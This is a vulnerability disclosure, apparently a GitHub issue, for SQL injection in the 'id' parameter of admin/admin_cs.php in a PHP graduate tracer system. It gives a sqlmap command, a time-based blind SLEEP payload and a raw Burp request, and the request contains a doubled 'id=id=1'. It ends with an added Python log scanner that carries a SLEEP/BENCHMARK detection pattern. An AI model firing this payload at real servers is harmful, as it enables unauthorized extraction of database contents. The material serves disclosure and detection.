zhang guixiang has discovered that Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code is affected by a serious SQL injection vulnerability caused by insufficient protection of the "id" parameter in the "admin/admin_cs.php" file. An attacker can use it to inject malicious SQL queries, resulting in unauthorized access to and extraction of sensitive information from the database.
Vulnerability Details
Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability
Vulnerable File: admin/admin_cs.php
Parameter Name: id
Attack Type: Remote
Proof of Concept (PoC):
sqlmap -u "www.tracking.com:8098/admin/admin_cs.php?id=1" -p id --dbms=mysql -v 3
---
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2975 FROM (SELECT(SLEEP(5)))ansi) AND 'Pxda'='Pxda
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
Burp Suite (PoC):
GET /admin/admin_cs.php?id=id=1' AND (SELECT 2975 FROM (SELECT(SLEEP(10)))ansi) AND 'Pxda'='Pxda HTTP/1.1
Host: www.tracking.com:8098
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
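As an added defensive example (not part of the original report), the following Python scans web server access logs for requests to admin/admin_cs.php whose id parameter is anything other than a plain integer, and separately labels the time-based blind payload shape sqlmap produced above. The log lines, client address and finding labels are constructed for this example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-format lines: a benign request, the URL-encoded form of the
# PoC's time-based payload, a plain tautology probe, and a request to a different script.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2024:10:00:01 +0000] "GET /admin/admin_cs.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Mar/2024:10:00:02 +0000] "GET /admin/admin_cs.php?id=1%27%20AND%20(SELECT%202975%20FROM%20(SELECT(SLEEP(10)))ansi)%20AND%20%27Pxda%27%3D%27Pxda HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Mar/2024:10:00:03 +0000] "GET /admin/admin_cs.php?id=1%20OR%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Mar/2024:10:00:04 +0000] "GET /admin/index.php?page=SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
# MySQL delay functions that sqlmap's time-based blind technique relies on.
TIME_BASED_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)


def is_valid_id(value: str) -> bool:
    """Allowlist check: a record id is a plain ASCII integer and nothing else.
    str.isdigit() is avoided on purpose because it also accepts Unicode digits."""
    return re.fullmatch(r"[0-9]+", value) is not None


def classify_request(target: str) -> Optional[str]:
    """Return a finding label for a request to admin/admin_cs.php, or None if benign."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/admin_cs.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("id")
    if values is None:
        return None
    # parse_qs already decoded once; a second pass catches double-encoded payloads.
    decoded = unquote_plus(values[0])
    if is_valid_id(decoded):
        return None
    if TIME_BASED_RE.search(decoded):
        return "time-based blind SQLi probe"
    return "non-numeric id"


def scan_log(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, label, request target) for each suspicious admin_cs.php hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match:
            label = classify_request(match.group("target"))
            if label:
                findings.append((lineno, label, match.group("target")))
    return findings
```

The same integer allowlist in `is_valid_id` is the input check the vulnerable script lacks; applying it server-side before the value reaches the query, together with a prepared statement, closes the injection regardless of payload shape.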
xuanluansec changed the title from "Online Chatting System using PHP/MySQL V1.0 admin/admin_cs.php - SQL injection vulnerability" to "Online Graduate Tracer System for College of ICT Alumni in PHP Free Source Code V1.0 admin/admin_cs.php - SQL injection vulnerability" on Mar 28, 2024.